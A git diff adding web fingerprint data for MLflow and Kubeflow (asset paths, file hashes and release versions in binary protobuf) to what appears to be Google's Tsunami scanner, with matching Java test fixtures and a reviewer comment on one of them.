+ 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +;frontend/src/app/pages/server-info/yamls/yamls.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/karma.conf.js" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/app/shared/storage-uri/storage-uri.component.html + 0.13.0-rc.0"O +>frontend/src/app/shared/storage-uri/storage-uri.component.scss + 0.13.0-rc.0"J +frontend/tslint.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"8 +'static/main-es5.5e1462243b4c0545dedf.js + 0.13.0-rc.0" +hfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"1 +&static/styles.d3261b523a374fc723b3.css +0.7.0"7 +,static/polyfills-es5.0290b245fbcca09184ac.js +0.7.0"G +releasing/VERSION +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"^ +(frontend/src/environments/environment.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"W +!frontend/src/app/types/grafana.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"N +=frontend/src/app/pages/server-info/events/events.component.ts + 0.13.0-rc.0"D +&static/scripts.d8cefbd4ddb78bf33724.js +0.8.0 +0.9.0 +0.10.0"l +6frontend/src/app/pages/server-info/logs/logs.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Y +#frontend/src/app/app.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"v +@frontend/src/app/pages/server-info/yamls/yamls.component.spec.ts +0.7.0 
+0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"b +,frontend/src/app/pages/index/index.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"L +config/base/istio.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Ufrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Ufrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"0 +frontend/src/app/types/event.ts + 0.13.0-rc.0"t +>frontend/src/app/pages/server-info/overview/overview.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Qfrontend/src/app/pages/server-info/details/transformer/transformer.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"| +Ffrontend/src/app/pages/server-info/details/shared/pod/pod.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"S +Bfrontend/src/app/pages/server-info/events/events.component.spec.ts + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/overview/component/component.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"3 +'static/main-es5.a5cd7efd5dde1bfea019.js +0.10.0"6 +*static/main-es2015.a5cd7efd5dde1bfea019.js +0.10.0" +Pfrontend/src/app/pages/server-info/details/explainer/explainer.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/server-info/logs/logs.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"y +Cfrontend/src/app/pages/server-info/overview/overview.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Q +frontend/tsconfig.spec.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/submit-form/submit-form.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"V + frontend/src/app/shared/utils.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"M +frontend/src/index.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/server-info/logs/logs.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q 
+;frontend/src/app/pages/submit-form/submit-form.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"y +Cfrontend/src/app/pages/server-info/overview/overview.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"[ +%frontend/src/app/pages/index/utils.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"n +8frontend/src/app/pages/submit-form/submit-form.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/overview/component/component.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/submit-form/submit-form.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"5 +*static/runtime-es5.1e5bc577140eb82f67e7.js +0.7.0"; +*static/runtime-es5.473a4e3f2669c8a1cd2d.js + 0.13.0-rc.0"e +/frontend/src/app/pages/index/index.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"N +frontend/proxy.conf.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Y +#frontend/src/app/app.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Rfrontend/src/app/pages/server-info/details/shared/container/container.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"O +frontend/src/kubeflow.css +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"[ +Jfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.ts + 0.13.0-rc.0"N +config/base/service.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"2 +&static/styles.670c153d6051b6adabed.css +0.10.0" +Qfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Kfrontend/src/app/pages/server-info/details/predictor/predictor.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"c +-frontend/src/environments/environment.prod.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +kfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Q +config/base/deployment.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"J 
+frontend/src/test.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"w +Afrontend/src/app/pages/server-info/metrics/metrics.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Xfrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"n +8frontend/src/app/pages/server-info/yamls/yamls.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"z +Dfrontend/src/app/pages/server-info/metrics/metrics.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Sfrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"P +frontend/package-lock.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"z +Dfrontend/src/app/pages/server-info/details/details.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"P +frontend/e2e/tsconfig.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"g +1frontend/src/app/pages/index/index.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"u +?frontend/src/app/pages/server-info/details/details.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Tfrontend/src/app/pages/server-info/details/shared/container/container.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"L +frontend/tsconfig.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"5 +*static/main-es2015.d8e7a931af75ca6eba2d.js +0.9.0"M +frontend/src/app/pages/server-info/logs/logs.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"~ +Hfrontend/src/app/pages/server-info/details/shared/pod/pod.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"\ +&frontend/src/app/app-routing.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"K +:frontend/src/app/pages/server-info/events/events.module.ts + 0.13.0-rc.0"h +2config/overlays/kubeflow/patches/web-app-vsvc.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Mfrontend/src/app/pages/server-info/details/predictor/predictor.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 
0.13.0-rc.0"> +Makefile +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Z +$config/overlays/kubeflow/params.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"G +frontend/i18n/messages.xlf +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +ffrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"W +!frontend/src/app/types/backend.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"A + favicon.ico +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"N +frontend/src/favicon.ico +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Kfrontend/src/app/pages/server-info/details/explainer/explainer.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/server-info/server-info.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"F +backend/Makefile +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"j +4frontend/src/app/pages/index/index.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Kfrontend/src/app/pages/server-info/details/shared/pod/pod.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"w +Afrontend/src/app/pages/server-info/details/details.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"| +Ffrontend/src/app/pages/server-info/overview/overview.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"O +hack/setup-dev-cluster.sh +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"K +frontend/browserslist +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/server-info/yamls/yamls.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"L +frontend/karma.conf.js +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"r + +-static/runtime-es2015.473a4e3f2669c8a1cd2d.js + 0.13.0-rc.0"@ 
+/static/polyfills-es2015.d556b54b60accb59b2d4.js + 0.13.0-rc.0" +Qfrontend/src/app/pages/server-info/overview/component/component.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"\ +&frontend/src/app/app.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"U +frontend/e2e/protractor.conf.js +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +hfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"] +Lfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.html + 0.13.0-rc.0"G +hack/variables.sh +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"5 +*static/main-es2015.06167965c3d1b2892706.js +0.7.0"a ++frontend/src/app/types/kfserving/v1beta1.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"7 +&static/styles.9bfe0c4db5394cb7d92b.css + 0.13.0-rc.0"@ + +Dockerfile +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"w +Afrontend/src/app/pages/server-info/details/details.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"W +!frontend/src/app/app.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/server-info/server-info.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"T +frontend/src/app/app.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Ifrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"p +:config/overlays/kubeflow/web-app-authorization-policy.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"H +*static/runtime-es5.1243042158ada9164cc0.js +0.8.0 +0.9.0 +0.10.0"P +frontend/e2e/src/app.po.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"b +,frontend/src/app/services/grafana.service.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"D +/static/polyfills-es2015.5483363f343843e60445.js +0.9.0 +0.10.0"8 +-static/runtime-es2015.1e5bc577140eb82f67e7.js +0.7.0"I +releasing/README.md +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"] 
+Lfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.scss + 0.13.0-rc.0 \ No newline at end of file diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/mlflow.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/mlflow.binproto new file mode 100755 index 000000000..daf3aa259 --- /dev/null +++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/mlflow.binproto 
@@ -0,0 +1,458 @@ + + +mlflowO +)static-files/static/css/main.6d30cbb0.css" + 58777542d3051566d4f847b5813459f3M +'static-files/static/js/main.3fc83bde.js" + d9350c8f4c092ba85a88e64b1554bcefM +'static-files/static/js/main.3241cb2f.js" + 7a165f75977c752c6159a95f2431ae14O +)static-files/static/css/main.c3fe171a.css" + 917733df1cb4d8056f9639fbd70e9370M +'static-files/static/js/main.1208e44c.js" + 88497eadd2eceae6368ef2d64c4db8b3O +)static-files/static/css/main.2a740fb6.css" + 717a38689118b5ee7e18f901476324a8M +'static-files/static/js/main.97a9d480.js" + aa47834480f58f5931abb1ec9c9b2f1c> +static-files/favicon.ico" + 17d430cc5ae66deef9b500a6faec6576M +'static-files/static/js/main.869400b7.js" + 5da1558593204dbc763559c166dd5ad9O +)static-files/static/css/main.fc452620.css" + a5b6759ebe0c46d5ae0d7df3f5395ccaM +'static-files/static/js/main.3f69fad5.js" + 80f2136b701ede50c3cc4ef79d5a9ebfM +'static-files/static/js/main.8f2ec15f.js" + 58839a947656c61cbab9ace4d82194c4M +'static-files/static/js/main.79ae5ec7.js" + fb3948533c6777954ffa641f4cc9a1a6O +)static-files/static/css/main.a8b090b0.css" + c1d296c1949becd8e6c6c99b64a3a368O +)static-files/static/css/main.d432e97f.css" + 5954adf5fa62d1626033eef98135348bM +'static-files/static/js/main.b3b196bf.js" + 4d99e49f9a0f44901fd822f66e4e8554M +'static-files/static/js/main.f119600c.js" + acb78be117bcde9a14d8597c3306eed4M +'static-files/static/js/main.ab8e25f3.js" + 1b1561a0f79a06502378964222c3acfdM +'static-files/static/js/main.4dd3381c.js" + a60f5df7e50ca39f6e3d64cc3dffc202@ +static-files/manifest.json" + 62086d24223bfd1b6f9ee96e2fe508bcO +)static-files/static/css/main.45d71c4b.css" + 52756e150d8f1f516999dda441b95d73M +'static-files/static/js/main.a051daa5.js" + 9c73aa6db5534b284e3041cac53a5a27M +'static-files/static/js/main.a75bee39.js" + 4292313d91fcfc4809bec12f1be57a84M +'static-files/static/js/main.0377a7f9.js" + 4220a28d453f3ebe1354ed069b8f5191M +'static-files/static/js/main.a2d0394f.js" + e1ed5dc20a28212951864560be8161a3M 
+'static-files/static/js/main.ce94c8c2.js" + 5176b4132bd269a01e137cd35621b18dO +)static-files/static/css/main.3b6f4584.css" + 18da093190fe15b15f7c4c638b1ad084M +'static-files/static/js/main.df57f185.js" + f9e8335314e3a6f4689c984baa1e4ea7M +'static-files/static/js/main.71510886.js" + 14a9a4f714e371c31a1d5272da007424M +'static-files/static/js/main.2d12c0ae.js" + fc382f4d60068406d3b0e63f3af3198eM +'static-files/static/js/main.b49c1c9a.js" + 78ed6bb4369e4b6063413f8cdca2026cO +)static-files/static/css/main.ef33a5e7.css" + da6884c4a83b3f741f3688bed5adb9e2M +'static-files/static/js/main.6125589f.js" + dec6166513b88d5e0b04433dd87ad0ffM +'static-files/static/js/main.803f1727.js" + 4eb173bbfe94cea6a7d37a803a495dc3M +'static-files/static/js/main.80fd8eef.js" + 2a3e4bf7e02f09d13184ad55ef8416bfM +'static-files/static/js/main.9f3548a7.js" + 4d1bf2010713ecc85c07edd45141139dM +'static-files/static/js/main.20598683.js" + 074886975848b4aa61f2b7cec8cf3f25O +)static-files/static/css/main.9b3f40e9.css" + da9e124bc5bf74b1de6fd94fdc697936O +)static-files/static/css/main.9eafd206.css" + 861b9be3c9e22e11e0e01999bc343a2aM +'static-files/static/js/main.77ba8472.js" + 3b44fb327883ff6b4d7544a1746aa10aM +'static-files/static/js/main.0de244d3.js" + ce917b9ad6dcf2065fb5953b22039468M +'static-files/static/js/main.2dfd8740.js" + ea86bca5f2bf9417c8006aa7590079c0M +'static-files/static/js/main.a14f1bf8.js" + e37dff68be4d5f3d782f9faee72f43f88 +" + 18da093190fe15b15f7c4c638b1ad084 +v2.0.0 +v2.0.1. +" + f9e8335314e3a6f4689c984baa1e4ea7 +v2.0.0/ +" + e1ed5dc20a28212951864560be8161a3 +v2.11.2. +" + a60f5df7e50ca39f6e3d64cc3dffc202 +v2.9.2. +" + 2a3e4bf7e02f09d13184ad55ef8416bf +v2.3.1. +" + 9c73aa6db5534b284e3041cac53a5a27 +v2.1.08 +" + 861b9be3c9e22e11e0e01999bc343a2a +v2.7.0 +v2.7.1/ +" + 7a165f75977c752c6159a95f2431ae14 +v2.10.2/ +" + 074886975848b4aa61f2b7cec8cf3f25 +v2.11.1. +" + 5176b4132bd269a01e137cd35621b18d +v2.6.0V +" + 717a38689118b5ee7e18f901476324a8 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0. 
+" + d9350c8f4c092ba85a88e64b1554bcef +v2.2.2. +" + 4d1bf2010713ecc85c07edd45141139d +v2.9.1. +" + 78ed6bb4369e4b6063413f8cdca2026c +v2.4.1. +" + fb3948533c6777954ffa641f4cc9a1a6 +v2.9.0L +" + 58777542d3051566d4f847b5813459f3 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2. +" + 80f2136b701ede50c3cc4ef79d5a9ebf +v2.2.1/ +" + 3b44fb327883ff6b4d7544a1746aa10a +v2.10.1/ +" + da6884c4a83b3f741f3688bed5adb9e2 +v1.30.0. +" + 4292313d91fcfc4809bec12f1be57a84 +v2.3.0/ +" + ea86bca5f2bf9417c8006aa7590079c0 +v2.10.08 +" + 5954adf5fa62d1626033eef98135348b +v2.1.0 +v2.1.1. +" + aa47834480f58f5931abb1ec9c9b2f1c +v2.7.0. +" + e37dff68be4d5f3d782f9faee72f43f8 +v2.3.2/ +" + ce917b9ad6dcf2065fb5953b22039468 +v1.30.01 +" + da9e124bc5bf74b1de6fd94fdc697936 + v2.0.0rc0. +" + 14a9a4f714e371c31a1d5272da007424 +v2.2.0B +" + a5b6759ebe0c46d5ae0d7df3f5395cca +v2.2.0 +v2.2.1 +v2.2.2B +" + 52756e150d8f1f516999dda441b95d73 +v2.3.0 +v2.3.1 +v2.3.2. +" + 4eb173bbfe94cea6a7d37a803a495dc3 +v2.8.1. +" + fc382f4d60068406d3b0e63f3af3198e +v2.4.2. +" + 58839a947656c61cbab9ace4d82194c4 +v2.4.0. +" + acb78be117bcde9a14d8597c3306eed4 +v2.7.1P +" + c1d296c1949becd8e6c6c99b64a3a368 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3. +" + 4d99e49f9a0f44901fd822f66e4e8554 +v2.1.1. +" + 4220a28d453f3ebe1354ed069b8f5191 +v2.5.0 +" + 62086d24223bfd1b6f9ee96e2fe508bc +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3E +" + 917733df1cb4d8056f9639fbd70e9370 +v2.10.0 +v2.10.1 +v2.10.2/ +" + 88497eadd2eceae6368ef2d64c4db8b3 +v2.11.0. 
+" + dec6166513b88d5e0b04433dd87ad0ff +v2.0.11 +" + 1b1561a0f79a06502378964222c3acfd + v2.0.0rc0/ +" + 5da1558593204dbc763559c166dd5ad9 +v2.11.3 +" + 17d430cc5ae66deef9b500a6faec6576 +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"S +)static-files/static/css/main.6d30cbb0.css +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2"3 +'static-files/static/js/main.3fc83bde.js +v2.2.2"4 +'static-files/static/js/main.3241cb2f.js +v2.10.2"L +)static-files/static/css/main.c3fe171a.css +v2.10.0 +v2.10.1 +v2.10.2"4 +'static-files/static/js/main.1208e44c.js +v2.11.0"] +)static-files/static/css/main.2a740fb6.css +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0"3 +'static-files/static/js/main.97a9d480.js +v2.7.0" +static-files/favicon.ico +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"4 +'static-files/static/js/main.869400b7.js +v2.11.3"I +)static-files/static/css/main.fc452620.css +v2.2.0 +v2.2.1 +v2.2.2"3 +'static-files/static/js/main.3f69fad5.js +v2.2.1"3 +'static-files/static/js/main.8f2ec15f.js +v2.4.0"3 +'static-files/static/js/main.79ae5ec7.js +v2.9.0"W +)static-files/static/css/main.a8b090b0.css +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"? 
+)static-files/static/css/main.d432e97f.css +v2.1.0 +v2.1.1"3 +'static-files/static/js/main.b3b196bf.js +v2.1.1"3 +'static-files/static/js/main.f119600c.js +v2.7.1"6 +'static-files/static/js/main.ab8e25f3.js + v2.0.0rc0"3 +'static-files/static/js/main.4dd3381c.js +v2.9.2" +static-files/manifest.json +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"I +)static-files/static/css/main.45d71c4b.css +v2.3.0 +v2.3.1 +v2.3.2"3 +'static-files/static/js/main.a051daa5.js +v2.1.0"3 +'static-files/static/js/main.a75bee39.js +v2.3.0"3 +'static-files/static/js/main.0377a7f9.js +v2.5.0"4 +'static-files/static/js/main.a2d0394f.js +v2.11.2"3 +'static-files/static/js/main.ce94c8c2.js +v2.6.0"? +)static-files/static/css/main.3b6f4584.css +v2.0.0 +v2.0.1"3 +'static-files/static/js/main.df57f185.js +v2.0.0"3 +'static-files/static/js/main.71510886.js +v2.2.0"3 +'static-files/static/js/main.2d12c0ae.js +v2.4.2"3 +'static-files/static/js/main.b49c1c9a.js +v2.4.1"6 +)static-files/static/css/main.ef33a5e7.css +v1.30.0"3 +'static-files/static/js/main.6125589f.js +v2.0.1"3 +'static-files/static/js/main.803f1727.js +v2.8.1"3 +'static-files/static/js/main.80fd8eef.js +v2.3.1"3 +'static-files/static/js/main.9f3548a7.js +v2.9.1"4 +'static-files/static/js/main.20598683.js +v2.11.1"8 +)static-files/static/css/main.9b3f40e9.css + v2.0.0rc0"? +)static-files/static/css/main.9eafd206.css +v2.7.0 +v2.7.1"4 +'static-files/static/js/main.77ba8472.js +v2.10.1"4 +'static-files/static/js/main.0de244d3.js +v1.30.0"4 +'static-files/static/js/main.2dfd8740.js +v2.10.0"3 +'static-files/static/js/main.a14f1bf8.js +v2.3.2 \ No newline at end of file 
diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java index 5fbbbd7d7..c875d4ea1 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java @@ -145,6 +145,15 @@ private CommonTestData() {} .build(); public static final Hash SOFTWARE_3_CSS_HASH = Hash.newBuilder().setHexString("1ebae34d06fc5a9be81b852a7c354041").build(); + + public static final CrawlResult SOFTWARE_4_MLFLOW = + CrawlResult.newBuilder() + .setCrawlTarget( + CrawlTarget.newBuilder().setUrl(fakeUrl("/login?from")).setHttpMethod("GET")) + .setResponseCode(200) + .setContent(ByteString.copyFromUtf8("MLFLOW")) + .build(); + public static final CrawlResult UNKNOWN_CONTENT = CrawlResult.newBuilder() .setCrawlTarget(CrawlTarget.newBuilder().setUrl(fakeUrl("/unknown")).setHttpMethod("GET")) @@ -157,6 +166,9 @@ private CommonTestData() {} SoftwareIdentity.newBuilder().setSoftware("Software2").build(); public static final SoftwareIdentity SOFTWARE_IDENTITY_3 = SoftwareIdentity.newBuilder().setSoftware("Software3").build(); + + public static final SoftwareIdentity SOFTWARE_IDENTITY_4 = + SoftwareIdentity.newBuilder().setSoftware("mlflow").build(); public static final FingerprintData FINGERPRINT_DATA_1 = FingerprintData.fromProto( Fingerprints.newBuilder() diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java index 097faafdc..a128ee23f 100644 
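Review bot: `SOFTWARE_4_MLFLOW` in the first hunk has no comment explaining the fixture, and neither its body `"MLFLOW"` nor its URL `/login?from` explains itself. The body presumably matches none of the hashes in the new mlflow.binproto, so a test using it has to identify MLflow by another signal, which a reader cannot tell from the constant. I would add a comment above it such as `// Crawl result with no known MLflow hash; detection is expected to come from the response the target serves, not from this content.` The second hunk's `SOFTWARE_IDENTITY_4` needs no change.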
--- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java
